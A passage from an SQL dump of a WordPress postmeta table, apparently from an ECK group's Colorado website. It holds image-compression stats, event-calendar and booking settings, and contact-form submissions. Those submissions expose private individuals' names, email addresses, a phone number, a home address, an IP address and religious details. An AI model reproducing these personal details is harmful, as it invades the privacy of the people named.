WP-Optimize'),(192791,269145,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:110956;s:12:\"smushed-size\";i:97987;s:15:\"savings-percent\";d:11.6899999999999995026200849679298698902130126953125;s:10:\"sizes-info\";a:9:{s:4:\"full\";a:2:{s:8:\"original\";i:110956;s:10:\"compressed\";i:97987;}s:6:\"medium\";a:2:{s:8:\"original\";i:22923;s:10:\"compressed\";i:21519;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:8285;s:10:\"compressed\";i:8032;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:84190;s:10:\"compressed\";i:78436;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:25096;s:10:\"compressed\";i:23484;}s:12:\"thumbrelated\";a:2:{s:8:\"original\";i:57633;s:10:\"compressed\";i:54722;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:41788;s:10:\"compressed\";i:39362;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:29968;s:10:\"compressed\";i:28296;}s:8:\"tileview\";a:2:{s:8:\"original\";i:29174;s:10:\"compressed\";i:27125;}}}'),(189163,268860,'mec_hide_end_time','0'),(189161,268860,'one_occurrence','0'),(184004,268565,'_edit_lock','1693407853:2'),(184005,268565,'_edit_last','2'),(192786,269145,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:795;s:6:\"height\";i:447;s:4:\"file\";s:25:\"2023/10/sunset-lake-6.jpg\";s:8:\"filesize\";i:110956;s:5:\"sizes\";a:8:{s:6:\"medium\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-350x196.jpg\";s:5:\"width\";i:350;s:6:\"height\";i:196;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22923;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8285;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:84190;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:25096;}s:12:\"thumbrelated\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-500x447.jpg\";s:5:\"width\";i:500;s:6:\"height\";i:447;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57633;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41788;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29968;}s:8:\"tileview\";a:5:{s:4:\"file\";s:25:\"sunset-lake-6-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:29174;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(192785,269145,'_wp_attached_file','2023/10/sunset-lake-6.jpg'),(192784,269144,'_edit_last','2'),(192783,269144,'_edit_lock','1696276912:2'),(192782,269144,'_dp_original','268962'),(192781,269144,'passster_area_shortcode',''),(192780,269144,'boldgrid_in_page_containers','1'),(192775,269144,'mec_event_status','EventScheduled'),(192776,269144,'mec_moved_online_link',''),(192777,269144,'mec_cancelled_reason',''),(192778,269144,'mec_display_cancellation_reason_in_single_page',''),(192779,269144,'boldgrid_hide_page_title','0'),(192774,269144,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(192773,269144,'mec_banner','a:0:{}'),(192772,269144,'mec_related_events','a:0:{}'),(192771,269144,'mec_event_gallery','a:0:{}'),(192770,269144,'mec_fields','a:0:{}'),(192769,269144,'mec_op','a:0:{}'),(192768,269144,'mec_bfixed_fields','a:0:{}'),(192767,269144,'mec_reg_fields','a:0:{}'),(192766,269144,'mec_reg_fields_global_inheritance','1'),(192765,269144,'mec_ticket_variations','a:0:{}'),(192764,269144,'mec_ticket_variations_global_inheritance','1'),(192763,269144,'mec_fees','a:0:{}'),(192762,269144,'mec_fees_global_inheritance','1'),(192761,269144,'mec_tickets','a:0:{}'),(189160,268860,'mec_allday','0'),(189159,268860,'mec_certain_weekdays','a:0:{}'),(183911,268561,'_wp_attached_file','2022/03/blue-mountain-stream-9.jpg'),(183912,268561,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1017;s:4:\"file\";s:34:\"2022/03/blue-mountain-stream-9.jpg\";s:8:\"filesize\";i:828885;s:5:\"sizes\";a:9:{s:6:\"medium\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-300x159.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19999;}s:5:\"large\";a:5:{s:4:\"file\";s:35:\"blue-mountain-stream-9-1024x542.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:542;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:184440;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:10011;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-768x407.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:407;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:110008;}s:9:\"thumblist\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:34183;}s:16:\"meccarouselthumb\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-474x324.jpg\";s:5:\"width\";i:474;s:6:\"height\";i:324;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:57595;}s:10:\"gridsquare\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-391x260.jpg\";s:5:\"width\";i:391;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:39516;}s:8:\"tileview\";a:5:{s:4:\"file\";s:34:\"blue-mountain-stream-9-300x400.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:400;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:41936;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:35:\"blue-mountain-stream-9-1536x814.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:814;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:363756;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(183915,268561,'original-file','2022/03/blue-mountain-stream-9-updraft-pre-smush-original.jpg'),(183916,268561,'smush-complete','1'),(183917,268561,'smush-info','The file was compressed from 809.46 KB to 757.97 KB saving 6.36 percent using WP-Optimize'),(183918,268561,'smush-stats','a:5:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:828885;s:12:\"smushed-size\";i:776165;s:15:\"savings-percent\";d:6.36000000000000031974423109204508364200592041015625;s:10:\"sizes-info\";a:10:{s:4:\"full\";a:2:{s:8:\"original\";i:828885;s:10:\"compressed\";i:776165;}s:6:\"medium\";a:2:{s:8:\"original\";i:19999;s:10:\"compressed\";i:19376;}s:5:\"large\";a:2:{s:8:\"original\";i:184440;s:10:\"compressed\";i:177591;}s:9:\"thumbnail\";a:2:{s:8:\"original\";i:10011;s:10:\"compressed\";i:9945;}s:12:\"medium_large\";a:2:{s:8:\"original\";i:110008;s:10:\"compressed\";i:105803;}s:9:\"thumblist\";a:2:{s:8:\"original\";i:34183;s:10:\"compressed\";i:33024;}s:16:\"meccarouselthumb\";a:2:{s:8:\"original\";i:57595;s:10:\"compressed\";i:55418;}s:10:\"gridsquare\";a:2:{s:8:\"original\";i:39516;s:10:\"compressed\";i:38045;}s:8:\"tileview\";a:2:{s:8:\"original\";i:41936;s:10:\"compressed\";i:40561;}s:9:\"1536x1536\";a:2:{s:8:\"original\";i:363756;s:10:\"compressed\";i:353457;}}}'),(192751,269144,'mec_repeat_interval','1'),(192752,269144,'mec_repeat_end',''),(192753,269144,'mec_repeat_end_at_occurrences','9'),(192754,269144,'mec_repeat_end_at_date',''),(192755,269144,'mec_advanced_days','a:0:{}'),(192756,269144,'mec_sequence','6'),(192757,269144,'mec_in_days',''),(192758,269144,'mec_not_in_days',''),(192759,269144,'mec_hourly_schedules','a:0:{}'),(192760,269144,'mec_booking','a:19:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184077,268568,'mec_color',''),(184078,268568,'mec_location_id','185'),(184079,268568,'mec_dont_show_map','0'),(184080,268568,'mec_organizer_id','1'),(184081,268568,'mec_read_more',''),(184082,268568,'mec_more_info',''),(184083,268568,'mec_more_info_title',''),(184084,268568,'mec_more_info_target','_self'),(184085,268568,'mec_cost',''),(184086,268568,'mec_currency','a:0:{}'),(184087,268568,'mec_additional_organizer_ids','a:0:{}'),(184088,268568,'mec_additional_location_ids','a:0:{}'),(184089,268568,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-25\";s:4:\"hour\";s:2:\"10\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-25\";s:4:\"hour\";s:2:\"11\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"AM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(184090,268568,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(184091,268568,'mec_certain_weekdays','a:0:{}'),(184092,268568,'mec_allday','0'),(184093,268568,'one_occurrence','0'),(184094,268568,'mec_hide_time','0'),(184095,268568,'mec_hide_end_time','0'),(184096,268568,'mec_comment',''),(184097,268568,'mec_timezone','global'),(184098,268568,'mec_countdown_method','global'),(184099,268568,'mec_public','1'),(184100,268568,'mec_start_date','2023-06-25'),(184101,268568,'mec_start_time_hour','10'),(184102,268568,'mec_start_time_minutes','30'),(184103,268568,'mec_start_time_ampm','AM'),(184104,268568,'mec_start_day_seconds','37800'),(184105,268568,'mec_end_date','2023-06-25'),(184106,268568,'mec_end_time_hour','11'),(184107,268568,'mec_end_time_minutes','30'),(184108,268568,'mec_end_time_ampm','AM'),(184109,268568,'mec_end_day_seconds','41400'),(184110,268568,'mec_repeat_status','0'),(184111,268568,'mec_repeat_type',''),(184112,268568,'mec_repeat_interval','1'),(184113,268568,'mec_repeat_end',''),(184114,268568,'mec_repeat_end_at_occurrences',''),(184115,268568,'mec_repeat_end_at_date',''),(184116,268568,'mec_advanced_days','a:0:{}'),(184117,268568,'mec_in_days',''),(184118,268568,'mec_not_in_days',''),(184119,268568,'mec_hourly_schedules','a:0:{}'),(184120,268568,'mec_booking','a:27:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"bookings_minimum_per_booking\";s:1:\"1\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_booking_button_label\";s:0:\"\";s:24:\"bookings_payable_inherit\";s:1:\"1\";s:16:\"bookings_payable\";s:3:\"100\";s:21:\"bookings_payable_type\";s:7:\"percent\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184121,268568,'mec_tickets','a:0:{}'),(184122,268568,'mec_fees_global_inheritance','1'),(184123,268568,'mec_fees','a:0:{}'),(184124,268568,'mec_ticket_variations_global_inheritance','1'),(184125,268568,'mec_ticket_variations','a:0:{}'),(184126,268568,'mec_reg_fields_global_inheritance','1'),(184127,268568,'mec_reg_fields','a:0:{}'),(184128,268568,'mec_bfixed_fields','a:0:{}'),(184129,268568,'mec_op','a:0:{}'),(184130,268568,'mec_fields','a:0:{}'),(184131,268568,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(184132,268568,'mec_event_status','EventScheduled'),(184133,268568,'mec_moved_online_link',''),(184134,268568,'mec_cancelled_reason',''),(184135,268568,'mec_display_cancellation_reason_in_single_page',''),(184136,268568,'protect_children',''),(184137,268568,'passster_activate_global_protection',NULL),(184138,268568,'passster_activate_protection',NULL),(184139,268568,'passster_protection_type','password'),(184140,268568,'boldgrid_hide_page_title','0'),(184141,268568,'_thumbnail_id','266830'),(184142,268568,'boldgrid_in_page_containers','1'),(184145,268568,'_dp_original','268567'),(184144,268568,'passster_area_shortcode',''),(184146,268568,'_edit_lock','1687289397:2'),(184147,268568,'_edit_last','2'),(184148,266311,'passster_area_shortcode',''),(184149,268571,'_field_133','Paula'),(184150,268571,'_field_134','Anderson'),(184151,268571,'_field_135','paulajanderson1@gmail.com'),(184152,268571,'_field_137','Compliments!'),(184153,268571,'_field_138','Hi! I am very impressed by your beautiful website with great events, fabulous graphics and a warm, welcoming feel. Keep up the great work of service to the Mahanta!\nPaula - Vahana Team Leader in NJ'),(184154,268571,'_form_id','13'),(184155,268571,'_seq_num','134'),(184156,268572,'mec_transaction_id','YON92518'),(184157,268572,'mec_user_id','1000083'),(184158,268572,'mec_verified','1'),(184159,268572,'mec_verification_key','0e3c518af6c5e26947805f3f7be53dcd'),(184160,268572,'mec_cancellation_key','22d2e7a66b25686e138da8d02b50939a'),(184161,268572,'mec_confirmed','1'),(184162,268572,'mec_event_id','268482'),(184163,268572,'mec_date','1686479400:1686483000'),(184164,268572,'mec_ticket_id',',1,'),(184165,268572,'mec_booking_time','2023-05-29 19:41:58'),(184166,268572,'mec_all_dates','a:0:{}'),(184167,268572,'mec_other_dates','a:0:{}'),(184168,268572,'mec_attention_time','1686479400:1686483000'),(184169,268572,'mec_attention_time_start','1686479400'),(184170,268572,'mec_attention_time_end','1686483000'),(184171,268572,'mec_book_date_submit','20230529194158'),(184172,268572,'mec_booking_location','129'),(184173,268572,'mec_ticket_price_1','0'),(184174,268572,'mec_attendees','a:1:{i:0;a:5:{s:5:\"email\";s:22:\"Antiasandsun@gmail.com\";s:4:\"name\";s:16:\"Anitha Nakakena \";s:2:\"id\";s:1:\"1\";s:5:\"count\";s:1:\"1\";s:7:\"buyerip\";s:15:\"174.162.137.210\";}}'),(184175,268572,'mec_price','0'),(184176,268572,'mec_gateway','MEC_gateway_free'),(184177,268572,'mec_gateway_label','Free'),(184178,268573,'_field_179','Michael'),(184179,268573,'_field_180','Fischer'),(184180,268573,'_field_181','mfischerak@gmail.com'),(184181,268573,'_field_182','CO'),(184182,268573,'_field_183','US'),(184183,268573,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in Colorado\";}'),(184184,268573,'_form_id','17'),(184185,268573,'_seq_num','19'),(184186,268574,'_field_133','Behrouz'),(184187,268574,'_field_134','Sohrabi'),(184188,268574,'_field_135','sohrabi.beh@gmail.com'),(184189,268574,'_field_137','Updating payment method for continuing membership'),(184190,268574,'_field_138','My name is Behrouz Sohrabi. I wish to make some changes to my recurring donation payment method.\n\nMy current credit card, which is linked to my monthly membership donation, is due to be closed soon. I would like to transition to another credit card to ensure the continuity of my membership status.\n\nCould you please provide guidance on how to update my payment details? Is there a specific process to follow, or perhaps a designated section on your website or user platform where I could do this?\n\nI am grateful for your assistance and look forward to your response.\n\nThank you for your time and support.\nMay the blessings be.'),(184191,268574,'_form_id','13'),(184192,268574,'_seq_num','135'),(184193,268575,'_field_224','Marc '),(184194,268575,'_field_225','Massengale '),(184195,268575,'_field_226','Billybobak@yahoo.com'),(184196,268575,'_field_227','CO'),(184197,268575,'_field_228','US'),(184198,268575,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(184199,268575,'_form_id','21'),(184200,268575,'_seq_num','175'),(184201,268578,'_field_224','Terese'),(184202,268578,'_field_225','Kitts'),(184203,268578,'_field_226','tfkitts@hotmail.com'),(184204,268578,'_field_227','CO'),(184205,268578,'_field_228','US'),(184206,268578,'_field_229','a:1:{i:0;s:39:\"Central Colorado/ECK Temple in Colorado\";}'),(184207,268578,'_form_id','21'),(184208,268578,'_seq_num','176'),(184270,268593,'passster_activate_global_protection',''),(184271,268593,'passster_activate_protection',''),(184272,268593,'passster_protection_type','password'),(184273,268593,'boldgrid_in_page_containers','1'),(184274,268593,'passster_area_shortcode',''),(184275,268593,'_thumbnail_id','268451'),(184276,268593,'_dp_original','268479'),(184277,268593,'_edit_lock','1687404846:2'),(184278,268593,'_edit_last','2'),(184279,268594,'_field_133','Damon'),(184280,268594,'_field_134','Fields'),(184281,268594,'_field_135','damon.fields2013@gmail.com'),(184282,268594,'_field_137','Need List of Local ECK Initiators'),(184283,268594,'_field_138','I am to get my next Initiation in ECK. Can you please send me a list of local ECK Initiators in Colorado by email. I live outside Boulder in Erie, Colorado. Or call me if needed: 720-484-9524 Thank you.'),(184284,268594,'_form_id','13'),(184285,268594,'_seq_num','136'),(184286,268595,'protect_children',''),(184287,268595,'mec_color',''),(184288,268595,'mec_location_id','187'),(184289,268595,'mec_dont_show_map','0'),(184290,268595,'mec_organizer_id','1'),(184291,268595,'mec_read_more',''),(184292,268595,'mec_more_info',''),(184293,268595,'mec_more_info_title',''),(184294,268595,'mec_more_info_target','_self'),(184295,268595,'mec_cost',''),(184296,268595,'mec_currency','a:0:{}'),(184297,268595,'mec_additional_organizer_ids','a:0:{}'),(184298,268595,'mec_additional_location_ids','a:0:{}'),(184299,268595,'mec_date','a:4:{s:5:\"start\";a:4:{s:4:\"date\";s:10:\"2023-06-14\";s:4:\"hour\";s:1:\"6\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:3:\"end\";a:4:{s:4:\"date\";s:10:\"2023-06-14\";s:4:\"hour\";s:1:\"7\";s:7:\"minutes\";s:2:\"30\";s:4:\"ampm\";s:2:\"PM\";}s:7:\"comment\";s:0:\"\";s:6:\"repeat\";a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}}'),(184300,268595,'mec_repeat','a:6:{s:4:\"type\";s:5:\"daily\";s:8:\"interval\";s:1:\"1\";s:8:\"advanced\";s:0:\"\";s:3:\"end\";s:5:\"never\";s:11:\"end_at_date\";s:0:\"\";s:18:\"end_at_occurrences\";s:2:\"10\";}'),(184301,268595,'mec_certain_weekdays','a:0:{}'),(184302,268595,'mec_allday','0'),(184303,268595,'one_occurrence','0'),(184304,268595,'mec_hide_time','0'),(184305,268595,'mec_hide_end_time','0'),(184306,268595,'mec_comment',''),(184307,268595,'mec_timezone','global'),(184308,268595,'mec_countdown_method','global'),(184309,268595,'mec_public','1'),(184310,268595,'mec_start_date','2023-06-14'),(184311,268595,'mec_start_time_hour','6'),(184312,268595,'mec_start_time_minutes','30'),(184313,268595,'mec_start_time_ampm','PM'),(184314,268595,'mec_start_day_seconds','66600'),(184315,268595,'mec_end_date','2023-06-14'),(184316,268595,'mec_end_time_hour','7'),(184317,268595,'mec_end_time_minutes','30'),(184318,268595,'mec_end_time_ampm','PM'),(184319,268595,'mec_end_day_seconds','70200'),(184320,268595,'mec_repeat_status','0'),(184321,268595,'mec_repeat_type',''),(184322,268595,'mec_repeat_interval','1'),(184323,268595,'mec_repeat_end',''),(184324,268595,'mec_repeat_end_at_occurrences',''),(184325,268595,'mec_repeat_end_at_date',''),(184326,268595,'mec_advanced_days','a:0:{}'),(184327,268595,'mec_in_days',''),(184328,268595,'mec_not_in_days',''),(184329,268595,'mec_hourly_schedules','a:0:{}'),(184330,268595,'mec_booking','a:22:{s:24:\"bookings_limit_unlimited\";s:1:\"0\";s:14:\"bookings_limit\";s:0:\"\";s:28:\"roles_discount_administrator\";s:0:\"\";s:21:\"roles_discount_editor\";s:0:\"\";s:21:\"roles_discount_author\";s:0:\"\";s:26:\"roles_discount_contributor\";s:0:\"\";s:25:\"roles_discount_subscriber\";s:0:\"\";s:24:\"roles_discount_organizer\";s:0:\"\";s:25:\"roles_discount_uram_guest\";s:0:\"\";s:24:\"bookings_all_occurrences\";s:1:\"0\";s:33:\"bookings_all_occurrences_multiple\";s:1:\"0\";s:26:\"show_booking_form_interval\";s:0:\"\";s:35:\"stop_selling_after_first_occurrence\";s:1:\"0\";s:11:\"auto_verify\";s:6:\"global\";s:12:\"auto_confirm\";s:6:\"global\";s:35:\"last_few_tickets_percentage_inherit\";s:1:\"1\";s:27:\"last_few_tickets_percentage\";s:3:\"100\";s:21:\"thankyou_page_inherit\";s:1:\"1\";s:21:\"booking_thankyou_page\";s:0:\"\";s:26:\"booking_thankyou_page_time\";s:4:\"2000\";s:29:\"bookings_user_limit_unlimited\";s:1:\"1\";s:19:\"bookings_user_limit\";s:0:\"\";}'),(184331,268595,'mec_tickets','a:0:{}'),(184332,268595,'mec_fees_global_inheritance','1'),(184333,268595,'mec_fees','a:0:{}'),(184334,268595,'mec_ticket_variations_global_inheritance','1'),(184335,268595,'mec_ticket_variations','a:0:{}'),(184336,268595,'mec_reg_fields_global_inheritance','1'),(184337,268595,'mec_reg_fields','a:0:{}'),(184338,268595,'mec_bfixed_fields','a:0:{}'),(184339,268595,'mec_op','a:0:{}'),(184340,268595,'mec_fields','a:0:{}'),(184341,268595,'mec_event_status','EventScheduled'),(184342,268595,'mec_moved_online_link',''),(184343,268595,'mec_cancelled_reason',''),(184344,268595,'mec_display_cancellation_reason_in_single_page',''),(184345,268595,'boldgrid_hide_page_title','0'),(184346,268595,'mec_notifications','a:3:{s:20:\"booking_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:0:\"\";s:7:\"content\";s:0:\"\";}s:18:\"email_verification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:27:\"Please verify your booking.\";s:7:\"content\";s:153:\"<p>Hi %%name%%,</p>\r\n<p>Please verify your booking by clicking on following link:</p>\r\n<p>%%verification_link%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}s:18:\"admin_notification\";a:3:{s:6:\"status\";s:1:\"0\";s:7:\"subject\";s:26:\"A new booking is received.\";s:7:\"content\";s:195:\"<p>Dear Admin,</p>\r\n<p>A new booking is received. Please check and confirm it as soon as possible.</p>\r\n<p>%%admin_link%%</p>\r\n<p>%%attendees_full_info%%</p>\r\n<p>Regards,<br />\r\n%%blog_name%%</p>\";}}'),(184347,268595,'passster_activate_global_protection',''),(184348,268595,'passster_activate_protection',''),(184349,268595,'passster_protection_type','password'),(184350,268595,'boldgrid_in_page_containers','1'),(184351,268595,'_dp_original','264610'),(184352,268595,'_edit_lock','1685726888:2'),(184353,268595,'passster_area_shortcode',''),(184354,268595,'_edit_last','2'),(184355,268595,'_thumbnail_id','266821'),(184357,268598,'_field_30','Marilyn'),(184358,268598,'_field_31','Sponza'),(184359,268598,'_field_32','(650) 365-2502'),(184360,268598,'_field_33','masponza@hushmail.com'),(184361,268598,'_field_34','1405 Vegas Verdes Dr Unit 137 Santa Fe 87507'),(184362,268598,'_field_35','Santa Fe'),(184363,268598,'_field_36','NM'),(184364,268598,'_field_37','US'),(184365,268598,'_field_39','I live in Santa Fe by way of California. So many friends have moved to Colorado that I would like to see. I also very much would like to attend Regional Seminars and H.I. Retreats. Thank you.'),(184366,268598,'_form_id','4'),(184367,268598,'_seq_num','34'),(184368,268599,'_field_179','Marilyn'),(184369,268599,'_field_180','Sponza'),(184370,268599,'_field_181','masponza@hushmail.com'),(184371,268599,'_field_182','NM'),(184372,268599,'_field_183','US'),(184373,268599,'_field_184','a:1:{i:0;s:41:\"Central Colorado - ECK Temple in 